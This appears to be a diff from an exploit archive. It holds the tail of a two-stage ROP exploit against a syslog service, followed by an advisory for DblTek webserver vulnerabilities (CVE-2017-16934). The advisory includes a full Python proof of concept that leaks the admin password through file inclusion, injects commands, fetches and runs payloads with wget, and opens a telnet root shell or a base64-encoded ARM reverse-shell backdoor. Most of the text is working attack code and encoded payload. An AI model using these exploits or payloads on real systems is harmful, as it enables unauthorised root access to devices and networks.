inc_edx,
inc_edx,
inc_edx,
inc_edx,
inc_edx,
inc_edx,
pop_ebx,
# points somewhere in the bss, just needs to be writable for the eax_to_stack gadget
e.bss(0x5fc0),
# the second stage goes to udp/65535, which the application binds but doesn't
# seem to use for anything. The only thing not completely deterministic in the exploit
# is the fd number of this port, which seems to be quite reliably 27 but sometimes 28.
# We get its fd from a class member, and we get the class via a singleton ::instance function.
# [root@vm bin]# lsof | grep syslog | grep UDP | grep 65535
# imcsyslog 24741 root 27u IPv4 39655685 0t0 UDP *:65535
get_instance,
mov_eax_eax_plus_0x5c,
eax_to_stack, # write the handle to the stack
# write the read count to the stack
zero_edx,
inc_edx,
inc_edx,
inc_edx,
inc_edx,
zero_eax,
add_eax_25f,
# picked up by the above into ebx, written to by eax_to_stack, just needs to be writable
e.bss(second_stage_offset_into_bss - 0x80),
0x41414141,
eax_to_stack, # write the handle to the stack
ret_C,
e.plt['read'],
0x41414141, 0x41414141, 0x41414141,
pop3_ret,
0x41414141, # placeholder for the fd of udp/65535
e.bss(second_stage_offset_into_bss),
0x41414141, # placeholder for the read count
pop_eax,
e.bss(second_stage_offset_into_bss),
xchg_eax_esp
)
assert '\0' not in first_stage
print('* Sending first stage to udp/514')
# print repr(first_stage)
s_514 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s_514.sendto(SYSLOG_FORWARD_HEAD + 'A'*48 + first_stage + '\0',
(IP, PORT))
s_514.close()
# the second stage does a dlopen/dlsym to get the address of the system function,
# then executes the given command via it.
second_stage = rop(
e.plt['dlopen'], # get libc handle
pop2_ret,
e.bss(second_stage_offset_into_bss + second_stage_data_offset),
2, # RTLD_NOW (why not)
# write the returned handle to the stack
zero_edx,
inc_edx,
pop_ebx,
e.bss(second_stage_offset_into_bss - 0x80), # somewhere in the bss
eax_to_stack, # write the handle to the stack
e.plt['dlsym'],
pop2_ret,
0x41516171, # placeholder, libc handle is written here
e.bss(second_stage_offset_into_bss + second_stage_data_offset + len(libc_str)), # address is 'system' string
# write the returned address to the stack
zero_edx,
inc_edx,
pop_ebx,
e.bss(second_stage_offset_into_bss - 0x80), # somewhere in the bss
eax_to_stack, # write the handle to the stack
ret,
ret,
0x51617181, # placeholder, the address of system gets written here
0x854ae76, # continuation of execution: a simple infinite loop of 0xeb 0xfe
e.bss(second_stage_offset_into_bss + second_stage_data_offset + len(libc_str) + len(system_str))
)
print('* Sending second stage to udp/65535')
# print repr(second_stage)
second_stage_final = second_stage.ljust(second_stage_data_offset) + second_stage_data
s_65535 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s_65535.sendto(second_stage_final.ljust(0x25f), (IP, PORT_SECOND_STAGE))
s_65535.close()
print('! Done.')
```

569
exploits/linux/webapps/44051.md Normal file
View file

@ -0,0 +1,569 @@
## Vulnerabilities summary
The following advisory describes 2 (two) vulnerabilities found in DblTek webserver.
DBL is “specialized in VoIP products, especially GoIPs. We design, develop, manufacture, and sell our products directly and via distributors to customers. Our GoIP models now cover 1, 4, 8, 16, and 32-channel in order to meet the wide range of market demands. All our products are priced very attractively and probably the lowest in the market. Because of the price and performance, GoIPs have been widely adopted by system integrators, VoIP service providers, and many other business and individual users.”
The vulnerabilities found are:
- Pre-authentication Information Disclosure
- Command Execution
It is possible to combine the 2 vulnerabilities and gain unauthenticated remote command execution.
## Credit
An independent security researcher has reported this vulnerability to Beyond Securitys SecuriTeam Secure Disclosure program
## Vendor response
DblTek has released patches to address those vulnerabilities.
CVE-2017-16934
## Vulnerabilities details
User controlled input is not sufficiently sanitized and can trigger Local File Inclusion.
By sending GET request to /dev/mtdblock/5 an attacker can download the configuration file that contain admin password:
```
GET /default/en_US/frame.html?content=/dev/mtdblock/5
```
After we got the admin password, we can send a POST request to change_password.csp and trigget the second vulnerability.
User controlled input is not sufficiently sanitized when pass to change_password.csp. An attacker can inject script containing malicious commands in a configuration variable and execute it.
```
POST /default/en_US/change_password.csp
Content-Type: application/x-www-form-urlencoded
Authorization: Basic ###BASE64("admin", ###LEAKED_PASSWORD###)###
level=user&user_level_enable=on&passwd=<%%25call system.exec: ###MALICIOUS_COMMAND###>
```
## Proof of Concept
Unauthenticated Remote Command Execution:
```
#!/usr/bin/python3
from http.server import BaseHTTPRequestHandler, HTTPServer
import os, sys, base64, bz2, socket, argparse, threading, requests, re
PAYLOAD0 = '''#!/bin/sh
rm -f /tmp/y
/bin/busybox telnetd -l /bin/sh -p %d &
'''
PAYLOAD1 = '''#!/bin/sh
rm -f /tmp/y /tmp/p
wget -O /tmp/p http://%s:%d/prism
chmod 755 /tmp/p
/tmp/p
'''
class Handler(BaseHTTPRequestHandler):
PRISM_PORT = 1337
TELNET_PORT = 23
def do_GET(self):
if self.path == '/0':
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
payload = PAYLOAD0 % Handler.TELNET_PORT
self.wfile.write(payload.encode())
return
if self.path == '/1':
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
payload = PAYLOAD1 % (Handler.HTTP_ADDR, Handler.HTTP_PORT)
self.wfile.write(payload.encode())
return
if self.path == '/prism':
self.send_response(200)
self.send_header('Content-type', 'octet/stream')
self.end_headers()
self.wfile.write(prism(Handler.HTTP_ADDR, Handler.PRISM_PORT))
return
self.send_response(404)
def log_message(self, format, *args):
print(' -- SERVING ' + format % args)
class Server(threading.Thread):
def __init__(self, addr='0.0.0.0', port=8080):
threading.Thread.__init__(self)
Handler.HTTP_ADDR = addr
Handler.HTTP_PORT = port
self.httpd = HTTPServer((addr, port), Handler)
def set(mime, data):
self.RequestHandlerClass.mime = mime
self.RequestHandlerClass.data = data
def run(self):
print(' - Starting server http://%s:%s' % self.httpd.socket.getsockname())
self.httpd.serve_forever()
def stop(self):
print(' - Stopping server')
self.httpd.shutdown()
def prism(host, port):
pyfile = open(os.path.realpath(__file__), 'r')
data, skip = '', True
for line in pyfile:
if skip and line != '""" PRISM ARM V5L\n':
continue
if line == '"""\n':
break
if not skip:
data += line.strip()
skip = False
port = str(port)
bhost = host.encode() + (b'\0' * (16 - len(host)))
bport = port.encode() + (b'\0' * ( 6 - len(port)))
binary = bytearray(bz2.decompress(base64.b64decode(data)))
binary[0x7810:0x7810+16] = bhost
binary[0x7820:0x7820+ 6] = bport
return binary
def getip(host):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect((host, 1337))
return s.getsockname()[0]
def get(url):
print(' -- GET %s' % url)
response = requests.get(url)
return response.text
def post(url, password, data):
print(' -- POST %s' % url)
header = { 'Content-Type': 'application/x-www-form-urlencoded' }
auth = requests.auth.HTTPBasicAuth('admin', password)
response = requests.post(url, auth=auth, data=data, headers=header)
return response.text
def attack_leak(target, variable):
print(' - Dumping configuration (variable=%s)' % variable)
config = get('http://%s/default/en_US/frame.html?content=/dev/mtdblock/5' % target)
m = re.search(r'%s="(.*)"' % variable, config)
if not m:
print('Cannot leak variable %s :(' % variable)
sys.exit(1)
return m.group(1)
def attack_exec(target, password, command):
print(' - Executing "%s"' % command)
argv = ', '.join(command.split())
data = 'level=user&user_level_enable=on&passwd=<%%25call system.exec: %s>' % argv
post('http://%s/default/en_US/change_password.csp' % target, password, data)
get('http://%s/default/en_US/frame.html?content=/dev/mtdblock/5' % target)
# Parsing attacker input
parser = argparse.ArgumentParser(description='DBLTek Unauthenticated Pre-Auth RCE as root', epilog="""
Available modes are:
1 - Use telnetd on port %d
2 - Use prism daemon with port %d
""" % (Handler.TELNET_PORT, Handler.PRISM_PORT), formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument('-a', '--addr', dest='addr', type=str, default=None, help="http server address")
parser.add_argument('-p', '--port', dest='port', type=int, default=8080, help="http server port (default: 8080)")
parser.add_argument('-m', '--mode', dest='mode', type=int, default=0, help="attack mode (default 0)")
parser.add_argument('target')
args = parser.parse_args(sys.argv[1:])
# Get local address based on target address and routes
myaddr = getip(args.target)
myport = args.port
# Start payload delivery server
server = Server(args.addr or myaddr, myport)
server.start()
try:
# Leak ADMIN_PASSWORD
password = attack_leak(args.target, 'ADMIN_PASSWORD')
print(" -- ADMIN_PASSWORD = '%s'" % password)
attack_exec(args.target, password, "/bin/wget -O /tmp/y http://%s:%d/%d" % (myaddr, myport, args.mode))
attack_exec(args.target, password, "/bin/sh /tmp/y")
print(""" - Use these commands to wipe:
-- => setsyscfg USER_PASSWORD=
-- => setsyscfg USER_LEVEL_ENABLE=0""")
if args.mode == 0:
print(" - Telnet to %s port %d" % (args.target, Handler.TELNET_PORT))
os.system("telnet %s %d" % (args.target, Handler.TELNET_PORT))
if args.mode == 1:
print(" - Listen on %s:%d (wait 15 seconds at least)" % (myaddr, Handler.PRISM_PORT))
os.system("nc -l -p %d" % Handler.PRISM_PORT)
except RuntimeError as e:
print(" - Failed :(")
pass
# Stop payload delivery server
server.stop()
server.join()
""" PRISM ARM V5L
QlpoOTFBWSZTWao5rFYALq1/////////////////////////////////////////////4EoPlbVQ
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
